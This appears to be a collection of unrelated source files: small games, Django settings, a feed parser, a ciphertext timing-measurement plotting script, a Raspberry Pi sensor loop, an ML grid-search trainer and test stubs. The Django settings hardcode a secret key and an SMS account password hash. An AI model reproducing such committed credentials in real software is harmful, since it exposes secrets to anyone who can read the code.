            # failure occurred.
            self.__invoker.escalate_failure(e, message)
|
import random

# Rock-paper-scissors against a random "AI"; choices are 1-indexed emoji.
rock = "👊"
paper = "✋"
scissors = "✌️"
choices = [rock, paper, scissors]

player = int(input(f"What do you choose? type 1 for {rock}, 2 for {paper} or 3 for {scissors}\n"))
print("You choose")
if player < 1 or player > 3:
    # Out-of-range input still rolls the AI and declares an automatic loss.
    print("Invalid")
    ai = random.randint(1 , 3)
    print("Artificial Intelligence choose")
    print(choices[ai - 1])
    print("You loose!, please follow simple instructions..")
elif player >= 1 or player <= 3:
    # NOTE(review): this `or` condition is always true (likely meant `and`),
    # but the branch is only reached when player is 1..3 anyway, so the
    # behavior is correct.
    print(choices[player - 1])
    ai = random.randint(1 , 3)
    print("Artificial Intelligence choose")
    print(choices[ai - 1])
    if player == ai:
        print("Draw!, Try again..")
    elif player == 1 and ai == 2 or player == 2 and ai == 3 or player == 3 and ai == 1:
        # Rock < Paper, Paper < Scissors, Scissors < Rock.
        print("You loose!, Pay your debt..")
    else:
        print("You Win!, get your rewards..")
# user_choice = int(input("What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\n"))
# if user_choice >= 3 or user_choice < 0:
# print("You typed an invalid number, you lose! ")
# else:
# print(game_images[user_choice])
# computer_choice = random.randint(0, 2)
# print("Computer chose:")
# print(game_images[computer_choice])
# if user_choice == 0 and computer_choice == 2:
# print("You win!")
# elif computer_choice == 0 and user_choice == 2:
# print("You lose")
# elif computer_choice > user_choice:
# print("You lose")
# elif user_choice > computer_choice:
# print("You win!")
# elif computer_choice == user_choice:
# print("It's a draw") |
"""
Django settings for djcems project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; for production it
# should come from the environment (e.g. os.environ) and be rotated.
SECRET_KEY = 'p1%p0=!)e+mh-u#+fs7$i^=#tt_m3gvv&^x5b*9xa%3em9pjvs'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# NOTE(review): with DEBUG = False, ALLOWED_HOSTS must list the served
# hostnames or every request will be rejected by Django.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'filebrowser',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'corsheaders',
'django_logtail',
'userprofile',
'vehicle',
'beacon',
'news',
'hello',
'misc',
'datastat',
# wysiwyg
'django_wysiwyg',
'tinymce',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
# 'django.middleware.locale.LocaleMiddleware',
)
ROOT_URLCONF = 'djcems.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djcems.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
},
# 'mysql': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'djrefiredb',
# 'USER': 'refire',
# 'PASSWORD': 'refire',
# 'HOST': '127.0.0.1',
# 'PORT': '3306',
# }
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'zh-Hans' # en-us
TIME_ZONE = 'Asia/Shanghai' # 'UTC', 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static_root')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
os.path.join(BASE_DIR, "media"),
]
# Cache
# CACHES = {
# "default": {
# "BACKEND": "django_redis.cache.RedisCache",
# "LOCATION": "redis://127.0.0.1:6379/0",
# "OPTIONS": {
# "CLIENT_CLASS": "django_redis.client.DefaultClient",
# }
# }
# }
#
# SESSION_ENGINE = "django.contrib.sessions.backends.cache"
# SESSION_CACHE_ALIAS = "default"
# rest framework
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated'
]
}
# CORS
CORS_ORIGIN_WHITELIST = (
'127.0.0.1:8100',
'localhost:8100',
'192.168.1.104:8100',
'10.10.5.81:8100',
'192.168.1.114:8100',
'',
'null',
)
CORS_ALLOW_CREDENTIALS = True
# CORS_EXPOSE_HEADERS = (
# "Access-Control-Allow-Origin",
# )
# LOG
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '[%(levelname)s] [%(clientip)s] [%(asctime)s] [%(module)s] [%(process)d] [%(thread)d] %(message)s'
}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
},
'file': {
'level': 'DEBUG',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': os.path.join(BASE_DIR, 'apilog.log'),
'when': 'midnight',
'formatter': 'verbose',
'interval': 1,
'backupCount': 0,
},
},
'loggers': {
# 'django': {
# 'handlers': ['console', 'file'],
# 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
# 'propagate': True,
# },
'django.request': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
'vehicle': {
'handlers': ['console', 'file'],
'level': 'DEBUG',
'propagate': True,
}
}
}
# huyi sms
SMS = {
'huyi': {
'username': 'cf_hongding',
'password': 'e6a52c828d56b46129fbf85c4cd164b3', # md5 already
}
}
# WYSIWYG
DJANGO_WYSIWYG_FLAVOR = "tinymce"
TINYMCE_DEFAULT_CONFIG = {
'plugins': "table,spellchecker,paste,searchreplace",
'theme': "advanced",
'cleanup_on_startup': True,
'custom_undo_redo_levels': 10,
}
# FILEBROWSER_MEDIA_URL = STATIC_URL + 'upload/'
LOGTAIL_FILES = {
'accesslog': '/var/log/apache2/app-access.log',
'django': os.path.join(BASE_DIR, 'apilog.log')
}
|
from urllib import parse
import itertools, json
from . import parsers, utils
def get_sitepage(url, cached_content=None):
    """Fetch the HTML at *url* (unless cached content is supplied) and wrap it.

    Returns a SitePage built from the parsed document.
    """
    content = cached_content or utils.encoded_text_from_url(url)
    document = parsers.get_site_soup(content)
    return SitePage(document, url=url)
def get_feedpage(url, cached_content=None, overtime=False):
    """Fetch feed content from *url* and return a feed page object.

    Attempts to parse the content as a JSON Feed first, then falls back to
    RSS/Atom XML.
    TODO: Add more intelligence to check the URL before trying to parse.
    """
    content = cached_content or utils.encoded_text_from_url(url)
    try:
        feed = parsers.get_json_feed(content)
    except (parsers.NotAJSONFeedError, json.decoder.JSONDecodeError):
        pass  # not JSON — fall through to the XML path below
    else:
        return JSONFeedPage(feed, url=url)
    channel, defaultns = parsers.get_rss_feed_parts(content, overtime=overtime)
    return RssFeedPage(channel, url=url, defaultns=defaultns)
class RssFeedPage(object):
    """Read-only view over a parsed RSS/Atom ``<channel>`` element tree.

    *defaultns* is the element namespace prefix (e.g. ``'{http://...}'``) or
    the empty string for un-namespaced feeds.
    """

    def __init__(self, tree, url='', defaultns=''):
        self.tree = tree  # parsed channel element (ElementTree-style API)
        self.defaultns = defaultns
        self.url = url

    def _first_non_self(self, tag):
        """Return text (or href attribute) of the first *tag* child whose
        rel attribute is not 'self', or None when no such element exists.

        BUG FIX: the original loops fell off the end and hit an
        UnboundLocalError when the element list was empty or every element
        had rel="self"; this helper returns None in those cases.
        """
        for elem in self.tree.findall('{}{}'.format(self.defaultns, tag)):
            if elem.attrib.get('rel') == 'self':
                continue
            return elem.text or elem.attrib.get('href')
        return None

    @property
    def title(self):
        title_elem = self.tree.find('{}title'.format(self.defaultns))
        return title_elem.text if title_elem is not None else None

    @property
    def description(self):
        description_elem = self.tree.find('{}description'.format(self.defaultns))
        return description_elem.text if description_elem is not None else None

    @property
    def link(self):
        """First non-self link, resolved against the feed URL when relative."""
        link = self._first_non_self('link')
        if self.url and link:
            link = parse.urljoin(self.url, link)
        return link

    @property
    def categories(self):
        """Set of category names gathered from the channel and its items."""
        return {
            c.text for c in itertools.chain(*(
                i.findall('{}category'.format(self.defaultns))
                for i in self.tree.findall('{}item'.format(self.defaultns)) + [self.tree]
            )) if c is not None and c.text
        }

    @property
    def image(self):
        """URL of the channel image, or None when absent."""
        return self._first_non_self('image/url')

    @property
    def cloud(self):
        """Cloud endpoint value, or None when absent."""
        return self._first_non_self('cloud')
class JSONFeedPage(object):
    """Adapter exposing common feed attributes from a parsed JSON Feed dict."""

    def __init__(self, feed, url=''):
        self.feed = feed  # parsed JSON Feed document (a dict)
        self.url = url

    @property
    def title(self):
        return self.feed.get('title')

    @property
    def description(self):
        return self.feed.get('description')

    @property
    def link(self):
        return self.feed.get('home_page_url')

    @property
    def image(self):
        """Best available image: author avatar, else feed icon, else favicon."""
        author = self.feed.get('author')
        image = author.get('avatar') if author else self.feed.get('icon')
        return image if image else self.feed.get('favicon')
class SitePage(object):
    """Wraps a parsed HTML document (BeautifulSoup) for feed discovery."""

    def __init__(self, soup, url=''):
        self.soup = soup
        self.url = url

    @property
    def possible_feeds(self):
        """Yield candidate feed URLs from rel="alternate" links.

        BUG FIX: the original compared ``href[:3] == 'http'`` — a 3-character
        slice against a 4-character string, which never matched.  urljoin
        resolves relative hrefs against the page URL and returns absolute
        hrefs unchanged, so a single call covers both cases.
        """
        for feed_elem in self.soup.find_all(rel='alternate'):
            yield parse.urljoin(self.url, feed_elem['href'])
|
import numpy as np
import matplotlib.pyplot as plt

## [byte]
# Aggregate the timing measurements per first ciphertext byte (0x00..0xFF)
# and plot the per-byte average.
byte_times = [0] * 256
byte_counts = [0] * 256
lines = []
count = 0
with open('result_0xff.txt') as f:
    lines = f.readlines()
# Each input line: "<hex ciphertext> <cycle count>"; bucket by the first byte.
for line in lines:
    fields = line.split()
    byte_value = int(fields[0][0:2], 16)
    byte_times[byte_value] += int(fields[1])
    byte_counts[byte_value] += 1
# Average per byte; report outliers above the 5440-cycle threshold.
final_result = [0] * 256
for idx, (n_samples, total) in enumerate(zip(byte_counts, byte_times)):
    final_result[idx] = total / n_samples
    if final_result[idx] > 5440:
        print(idx, final_result[idx])
x1 = [0] * 256
for i in range(0, 256):
    x1[i] = i
x = np.arange(0, 256)
plt.plot(x1, final_result)
plt.ylabel("Timing Measurement(cycles)")
plt.xlabel("The first byte of ciphertexts")
plt.savefig("graph_0xff.pdf")
|
1. Let _to_ be ? ToObject(_target_).
1. If only one argument was passed, return _to_.
1. Let _sources_ be the List of argument values starting with the second argument.
1. For each element _nextSource_ of _sources_, in ascending index order, do
1. If _nextSource_ is neither *undefined* nor *null*, then
1. Let _from_ be ! ToObject(_nextSource_).
1. Let _keys_ be ? _from_.[[OwnPropertyKeys]]().
1. For each element _nextKey_ of _keys_ in List order, do
1. Let _desc_ be ? _from_.[[GetOwnProperty]](_nextKey_).
1. If _desc_ is not *undefined* and _desc_.[[Enumerable]] is *true*, then
1. Let _propValue_ be ? Get(_from_, _nextKey_).
1. Perform ? Set(_to_, _nextKey_, _propValue_, *true*).
1. Return _to_. |
from datetime import date
from starlette.templating import Jinja2Templates
from backend.schemas.issues import Label, Severity, Status

# Jinja2 environment rooted at the frontend component templates.
templates = Jinja2Templates(directory="frontend/components")
# Merge app-wide globals into the environment so every template can reference
# the issue enums and current date without passing them in each context.
# NOTE(review): current_year/current_date are evaluated once at import time,
# so a long-running process serves a stale date after midnight — confirm
# this is acceptable.
templates.env.globals = {
    **templates.env.globals,
    "severity": Severity,
    "status": Status,
    "label": Label,
    "current_year": date.today().year,
    "current_date": date.today(),
}
|
from .auth import SignupApi, InitialLoginApi, PassLoginApi, GetUserNotifIdApi, GetUsersNotifIdsApi, GetAllUsersApi
from .portfolio import GetAllPortfoliosApi, GetPortfoliosApi, AddPortfolioItemApi, SetPortfolioBuyTarget, SetPortfolioSellTarget, PortfolioDeleteApi, GetSinglePortfolioApi
from .change import GetChangesApi, AddChangeItemApi
from .ticker import GetTickersApi, GetAllTickerDetailsApi, GetAllCurrencyDetailsApi, GetSingleTickerApi, GetSingleTickerDetailsApi, AddTickerItemApi, AddTickerScrapDataApi, TickerSearchApi
from .transaction import GetAllTransactionsApi, GetTransactionsApi, GetMixedTransactionsApi, AddTransactionItemApi, DeleteTransactionItemApi, SetInformTransactionItemApi, SellTransactionItemApi, GetTracingTransactionsApi, SetCurrentPriceTransactionItemApi, SetTracedTransactionItemApi
from .notifications import GetNotificationsApi, AddNotificationItemApi, NotificationViewedApi, DeleteNotificationApi
from .simulation import SimulationResultApi, AddSimulationApi, SimulationSaveApi
def initialize_routes(api):
    """Register every REST resource on *api* under its URL rule.

    Registration order matches the original call sequence exactly.
    """
    routes = [
        (SignupApi, '/api/auth/signup'),
        (InitialLoginApi, '/api/auth/login'),
        (PassLoginApi, '/api/auth/login/<code>'),
        (GetUserNotifIdApi, '/api/auth/user-notifid'),
        (GetUsersNotifIdsApi, '/api/auth/notif-ids'),
        (GetAllUsersApi, '/api/auth/users'),
        (GetAllPortfoliosApi, '/api/portfolio/all'),
        (GetPortfoliosApi, '/api/portfolio'),
        (GetSinglePortfolioApi, '/api/portfolio/single'),
        (AddPortfolioItemApi, '/api/portfolio/add'),
        (SetPortfolioBuyTarget, '/api/portfolio/setbuytarget'),
        (SetPortfolioSellTarget, '/api/portfolio/setselltarget'),
        (PortfolioDeleteApi, '/api/portfolio/delete'),
        (GetChangesApi, '/api/change'),
        (AddChangeItemApi, '/api/change/add'),
        (GetTickersApi, '/api/ticker'),
        (GetAllTickerDetailsApi, '/api/ticker/all'),
        (GetAllCurrencyDetailsApi, '/api/ticker/currencies'),
        (GetSingleTickerApi, '/api/ticker/single'),
        (GetSingleTickerDetailsApi, '/api/ticker/single-details'),
        (AddTickerItemApi, '/api/ticker/add'),
        (AddTickerScrapDataApi, '/api/ticker/scrap'),
        (TickerSearchApi, '/api/ticker/search'),
        (GetAllTransactionsApi, '/api/transaction/all'),
        (GetTransactionsApi, '/api/transaction'),
        (GetMixedTransactionsApi, '/api/transaction/mixed'),
        (AddTransactionItemApi, '/api/transaction/add'),
        (DeleteTransactionItemApi, '/api/transaction/delete'),
        (SetInformTransactionItemApi, '/api/transaction/inform'),
        (SellTransactionItemApi, '/api/transaction/sell'),
        (GetTracingTransactionsApi, '/api/transaction/tracing'),
        (SetCurrentPriceTransactionItemApi, '/api/transaction/set-current-price'),
        (SetTracedTransactionItemApi, '/api/transaction/set-traced'),
        (GetNotificationsApi, '/api/notification'),
        (AddNotificationItemApi, '/api/notification/add'),
        (NotificationViewedApi, '/api/notification/viewed'),
        (DeleteNotificationApi, '/api/notification/delete'),
        (SimulationResultApi, '/api/simulation'),
        (AddSimulationApi, '/api/simulation/add'),
        (SimulationSaveApi, '/api/simulation/save'),
    ]
    for resource, url in routes:
        api.add_resource(resource, url)
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
"""
日本語Kivy解説書でHello World的な
"""
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Rectangle
class Field(Widget):
    """Root widget: paints the background image and places a single Bird."""

    def __init__(self):
        super().__init__()
        background = Rectangle(source='background.jpg', size=(1024, 768))
        self.canvas.add(background)
        self.add_widget(Bird())
class Bird(Widget):
    """Sprite widget drawn as a fixed-size rectangle at a fixed position."""

    def __init__(self):
        super().__init__()
        sprite = Rectangle(source='unko.png', size=(100, 200), pos=(100, 100))
        self.canvas.add(sprite)
class MyApp(App):
    """Application entry point; the root widget is a Field."""
    def build(self):
        # Kivy calls build() once to obtain the root widget tree.
        return Field()
# Launch the Kivy event loop when run as a script.
if __name__ == '__main__':
    MyApp().run()
|
from math import comb
from helpers import analytics
analytics.monitor()
def main():
    """Count the values of C(n, r), 1 <= n <= 100, that exceed one million.

    (Project Euler problem 53.)
    """
    return sum(
        1
        for n in range(1, 101)
        for r in range(n + 1)
        if comb(n, r) > 1000000
    )
print(main(), analytics.lap(), analytics.maxMem()) |
# ******************************************
# © 2019 Amar Lokman Some Rights Reserved
# ******************************************
# ---------------------------------------------------------
# ADD MODULES
# ---------------------------------------------------------
import time
import Adafruit_MCP3008
import datetime
import RPi.GPIO as GPIO
# ---------------------------------------------------------
# GPIO CONFIGURATION
# ---------------------------------------------------------
# Set BCM Pin for this Pi
# Set BCM Pin for this Pi
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Output pins: relay driving the bulb (driven LOW to switch on, per the main
# loop below) and an indicator LED.
GPIO_RELAY = 20
GPIO_LED = 16
GPIO.setup(GPIO_LED, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(GPIO_RELAY,GPIO.OUT, initial=GPIO.HIGH)
# Bit-banged SPI pins for the MCP3008 ADC that reads the IR sensor.
CLK = 11
MISO = 9
MOSI = 10
CS = 8
mcp = Adafruit_MCP3008.MCP3008(clk=CLK, cs=CS, miso=MISO, mosi=MOSI)
# ---------------------------------------------------------
# CONSTANT CONFIGURATION
# ---------------------------------------------------------
count1 = 0  # consecutive in-range detections (state machine below)
count2 = 0  # consecutive out-of-range detections
# Detection window bounds — presumably centimetres, matching the sensor's
# banner above; TODO confirm units against the calibration in distance().
minHeight = 40
maxHeight = 250
# ---------------------------------------------------------
# SHARP Infrared Sensor 100cm to 550cm CONFIGURATION
# ---------------------------------------------------------
def distance():
    """Return the distance averaged over 75 samples of ADC channel 0.

    Each raw reading is converted with the sensor calibration curve
    28250 / (adc - 229.5) before averaging.
    """
    sample_count = 75
    total = 0
    for _ in range(sample_count):
        raw = mcp.read_adc(0)
        total = total + 28250 / (raw - 229.5)
    return total / sample_count
# ---------------------------------------------------------
# MAIN FUNCTION
# ---------------------------------------------------------
if __name__ == '__main__':
    try:
        # Simple presence state machine: states 1/2 switch the bulb on while
        # something is within the detection window, states 3/4 switch it off.
        while True:
            # BUG FIX: `dist` was read but never assigned, raising a
            # NameError on the first iteration — take a fresh averaged
            # reading on every pass through the loop.
            dist = distance()
            print("Distance {:.2f}".format(dist))
            time.sleep(2)
            print("****************************************************")
            if (count1 == 0):
                if (dist > minHeight and dist < maxHeight):
                    # Enter condition: switch ON bulb (relay active-low) and LED
                    GPIO.output(GPIO_RELAY, GPIO.LOW)
                    GPIO.output(GPIO_LED, GPIO.HIGH)
                    count1 += 1
                    count2 = 0
                    print("---------- State 1 ------------")
                    time.sleep(2)
            else:
                if (dist > minHeight and dist < maxHeight):
                    # Still occupied: keep the bulb and LED on
                    GPIO.output(GPIO_RELAY, GPIO.LOW)
                    GPIO.output(GPIO_LED, GPIO.HIGH)
                    count1 += 1
                    print("---------- State 2 ------------")
                    time.sleep(2)
                else:
                    if (count2 == 0):
                        # Exit condition: switch OFF bulb and LED
                        GPIO.output(GPIO_RELAY, GPIO.HIGH)
                        GPIO.output(GPIO_LED, GPIO.LOW)
                        count2 += 1
                        print("---------- State 3 ------------")
                        time.sleep(1)
                    else:
                        # Still vacant: keep everything off and rearm state 1
                        GPIO.output(GPIO_RELAY, GPIO.HIGH)
                        GPIO.output(GPIO_LED, GPIO.LOW)
                        count1 = 0
                        print("---------- State 4 ------------")
                        time.sleep(1)
    except KeyboardInterrupt:
        print("Ending Script Coding")
|
import threading
from fsync.master import Master
from fsync.slave import Slave
from fsync import common
import asyncio
import os
import shutil
import time
import logging
def run_thread(runnable: common.Runnable):
    """Run *runnable*'s coroutine on its own daemon thread; return the thread."""
    worker = threading.Thread(target=lambda: asyncio.run(runnable.run()))
    worker.daemon = True  # don't block interpreter shutdown
    worker.start()
    return worker
def test_slave_master():
    """Smoke test: start a Slave listener, then a Master syncing data/ to it.

    NOTE(review): the test makes no assertions — it only checks that nothing
    raises within the 10-second window; consider verifying slave_dir contents.
    """
    slave_dir = "tmp/slave_dir"
    os.makedirs(slave_dir, exist_ok=True)
    try:
        cfg = common.MappingConfig(master_dir="data/", slave_dir=slave_dir)
        master = Master(slave_addr=("127.0.0.1", 31415),
                        ssl_context=None,
                        mapping_config=cfg)
        slave = Slave(listen_addr=("127.0.0.1", 31415),
                      ssl_context=None)
        # Start the slave first so its socket is listening before the master
        # connects; the 0.5 s pause gives it time to bind.
        process_slave = run_thread(slave)
        time.sleep(0.5)
        process_master = run_thread(master)
        # Let the sync run for a fixed window before returning.
        time.sleep(10)
        return
    finally:
        pass
        # shutil.rmtree("tmp")
|
import pygame
from pygame.locals import *
from Puntos import *
class Jugador():
    """Human player for a dots-and-boxes style board game (pygame)."""

    def __init__(self):
        super(Jugador, self).__init__()

    def mover(self, move, numColum, tablero):
        """Record the edge between the two cells in *move* on the board.

        A horizontal edge ("-") sits one index between the endpoints; a
        vertical edge ("|") sits one row (numColum) between them.  Returns
        "Error" when the endpoints are not adjacent; returns None otherwise.
        """
        if(move[0] + 1 == move[1] - 1):
            tablero[move[0] + 1] = "-"
        elif(move[0] + numColum == move[1] - numColum):
            tablero[move[0] + numColum] = "|"
        else:
            return "Error"

    def conectar(self, pantalla, x1, y1, x2, y2):
        # Draw the line connecting the two selected dots on the screen.
        pygame.draw.line(pantalla, (0, 0, 0),
                         (x1, y1), (x2, y2), 10)

    def realizarMov(self, encola, tablero, pantalla, numCol):
        """Draw and record the move between the two queued points in *encola*.

        Returns "Agente" (hand the turn to the agent) when a new edge was
        drawn; returns None when the slot is occupied or points not adjacent.
        """
        #print(encola[0].valor, encola[1].valor)
        # Branch on point order so the edge index is computed from the
        # larger (or smaller) cell value symmetrically.
        if(encola[0].valor > encola[1].valor):
            if(encola[0].valor - 1 == encola[1].valor + 1):
                # Horizontal edge between column-adjacent cells.
                if(tablero[encola[0].valor - 1] != "-"):
                    self.conectar(pantalla, encola[0].x, encola[0].y,
                                  encola[1].x, encola[1].y)
                    #self.mover([encola[1].x, encola[1].y], numCol)
                    tablero[encola[0].valor - 1] = "-"
                    return "Agente"
            elif(encola[0].valor - numCol == encola[1].valor + numCol):
                # Vertical edge between row-adjacent cells.
                if(tablero[encola[0].valor - numCol] != "|"):
                    self.conectar(pantalla, encola[0].x, encola[0].y,
                                  encola[1].x, encola[1].y)
                    tablero[encola[0].valor - numCol] = "|"
                    return "Agente"
        elif(encola[0].valor < encola[1].valor):
            if(encola[0].valor + 1 == encola[1].valor - 1):
                if(tablero[encola[0].valor + 1] != "-"):
                    self.conectar(pantalla, encola[0].x, encola[0].y,
                                  encola[1].x, encola[1].y)
                    tablero[encola[0].valor + 1] = "-"
                    return "Agente"
            elif(encola[0].valor + numCol == encola[1].valor - numCol):
                if(tablero[encola[0].valor + numCol] != "|"):
                    self.conectar(pantalla, encola[0].x, encola[0].y,
                                  encola[1].x, encola[1].y)
                    tablero[encola[0].valor + numCol] = "|"
                    return "Agente"

    def haylazo(self, puntos, numlazos):
        """Award an extra "lazo" once the score reaches 30.

        Returns (previous lazo count, current lazo count).
        """
        nlazoJ = numlazos
        if puntos >= 30:
            #nlazoJ = numlazos
            numlazos += 1
        return nlazoJ, numlazos # [N° lazos anterior, N° lazos actual]
from typing import Dict, List, Tuple
import numpy as np
from torch.utils.data.dataloader import DataLoader
from message_passing_nn.data.data_preprocessor import DataPreprocessor
from message_passing_nn.infrastructure.graph_dataset import GraphDataset
from message_passing_nn.model.trainer import Trainer
from message_passing_nn.utils.logger import get_logger
from message_passing_nn.utils.saver import Saver
class GridSearch:
    """Trains one model per hyper-parameter configuration and records losses."""

    def __init__(self,
                 dataset: GraphDataset,
                 data_preprocessor: DataPreprocessor,
                 trainer: Trainer,
                 grid_search_configurations: List[Tuple[Tuple]],
                 saver: Saver) -> None:
        self.dataset = dataset
        self.data_preprocessor = data_preprocessor
        self.trainer = trainer
        self.grid_search_configurations = grid_search_configurations
        self.saver = saver
        # Losses are keyed by configuration_id, then by epoch.
        self.results = {'training_loss': {},
                        'validation_loss': {},
                        'test_loss': {}}

    def start(self) -> Dict:
        """Run every configuration in the grid and return the recorded losses."""
        get_logger().info('Starting Grid Search')
        configuration_id = ''
        for configuration in self.grid_search_configurations:
            configuration_dictionary, dataloaders = self._build_a_configuration(configuration)
            # BUG FIX: remember the current id — previously the results were
            # saved under the initial empty string instead of a real id.
            configuration_id = configuration_dictionary['configuration_id']
            self._train_a_single_configuration(configuration_id,
                                               dataloaders,
                                               configuration_dictionary['epochs'],
                                               configuration_dictionary['validation_period'])
        self.saver.save_results(self.results, configuration_id)
        get_logger().info('Finished Training')
        return self.results

    def _train_a_single_configuration(self,
                                      configuration_id: str,
                                      dataloaders: Tuple[DataLoader, DataLoader, DataLoader],
                                      epochs: int,
                                      validation_period: int) -> None:
        """Train for *epochs*, validating every *validation_period* epochs."""
        # BUG FIX: the log format string had no '{}' placeholder, so the
        # configuration id was silently dropped from the message.
        get_logger().info('Starting training: {}'.format(configuration_id))
        training_data, validation_data, test_data = dataloaders
        validation_loss_max = np.inf
        for epoch in range(1, epochs + 1):
            training_loss = self.trainer.do_train_step(training_data, epoch)
            self.results['training_loss'][configuration_id].update({epoch: training_loss})
            if epoch % validation_period == 0:
                validation_loss = self.trainer.do_evaluate_step(validation_data, epoch)
                # BUG FIX: track the best validation loss seen so far —
                # previously the threshold never changed from np.inf, so
                # every validation step overwrote the "best" model.
                validation_loss_max = self._save_best_model(configuration_id, epoch,
                                                            validation_loss, validation_loss_max)
                self.results['validation_loss'][configuration_id].update({epoch: validation_loss})
        # NOTE(review): no epoch argument here, unlike the validation call —
        # confirm Trainer.do_evaluate_step allows it to default.
        test_loss = self.trainer.do_evaluate_step(test_data)
        self.results['test_loss'][configuration_id].update({'final_epoch': test_loss})
        get_logger().info('Finished training: {}'.format(configuration_id))

    def _save_best_model(self, configuration_id, epoch, validation_loss, validation_loss_max):
        """Persist the model when validation improved; return the new best loss."""
        if validation_loss < validation_loss_max:
            self.saver.save_model(epoch, configuration_id, self.trainer.model)
            return validation_loss
        return validation_loss_max

    def _build_a_configuration(self, configuration: Tuple[Tuple]) \
            -> Tuple[dict, Tuple[DataLoader, DataLoader, DataLoader]]:
        """Build the trainer, dataloaders and results slots for one configuration."""
        configuration_dictionary = self._get_configuration_dictionary(configuration)
        dataloaders, data_dimensions = self._prepare_dataset(configuration_dictionary)
        self.trainer.build(data_dimensions, configuration_dictionary)
        self._update_results_dict_with_configuration_id(configuration_dictionary)
        return configuration_dictionary, dataloaders

    @staticmethod
    def _get_configuration_dictionary(configuration: Tuple[Tuple]) -> dict:
        """Turn a tuple of (key, value) pairs into a dict with a unique id."""
        configuration_dictionary = dict(configuration)
        configuration_id = 'configuration&id'
        for key, value in configuration_dictionary.items():
            configuration_id += '__' + '&'.join([key, str(value)])
        configuration_dictionary.update({'configuration_id': configuration_id})
        return configuration_dictionary

    def _prepare_dataset(self, configuration_dictionary: Dict) \
            -> Tuple[Tuple[DataLoader, DataLoader, DataLoader], dict]:
        """Split the dataset into train/validation/test loaders."""
        dataloaders = self.data_preprocessor.train_validation_test_split(self.dataset,
                                                                         configuration_dictionary['batch_size'],
                                                                         configuration_dictionary['validation_split'],
                                                                         configuration_dictionary['test_split'])
        data_dimensions = self.data_preprocessor.extract_data_dimensions(self.dataset)
        return dataloaders, data_dimensions

    def _update_results_dict_with_configuration_id(self, configuration_dictionary: Dict) -> None:
        # Pre-create an empty per-configuration slot in every loss table.
        for key in self.results:
            self.results[key].update({configuration_dictionary['configuration_id']: {}})
|
########################################################################
# test_req_task_imhistory.py
#
# Copyright (C) 2018
# Associated Universities, Inc. Washington DC, USA
#
# This script is free software; you can redistribute it and/or modify it
# under the terms of the GNU Library General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public
# License for more details.
#
# [Add the link to the JIRA ticket here once it exists]
#
# Based on the requirements listed in plone found here:
# https://casa.nrao.edu/casadocs-devel/stable/global-task-list/task_imhistory/about
#
#
##########################################################################
# Import shim: CASA 6 ships tasks/tools as regular python packages, while
# CASA 5 injects everything through the casapy global namespace.
CASA6 = False
try:
    import casatools
    from casatasks import imhistory, casalog
    import sys
    import os
    myia = casatools.image()
    tb = casatools.table()
    sys.path.append(os.path.abspath(os.path.dirname(__file__)))
    CASA6 = True
except ImportError:
    import sys
    import os
    from __main__ import default
    from tasks import *
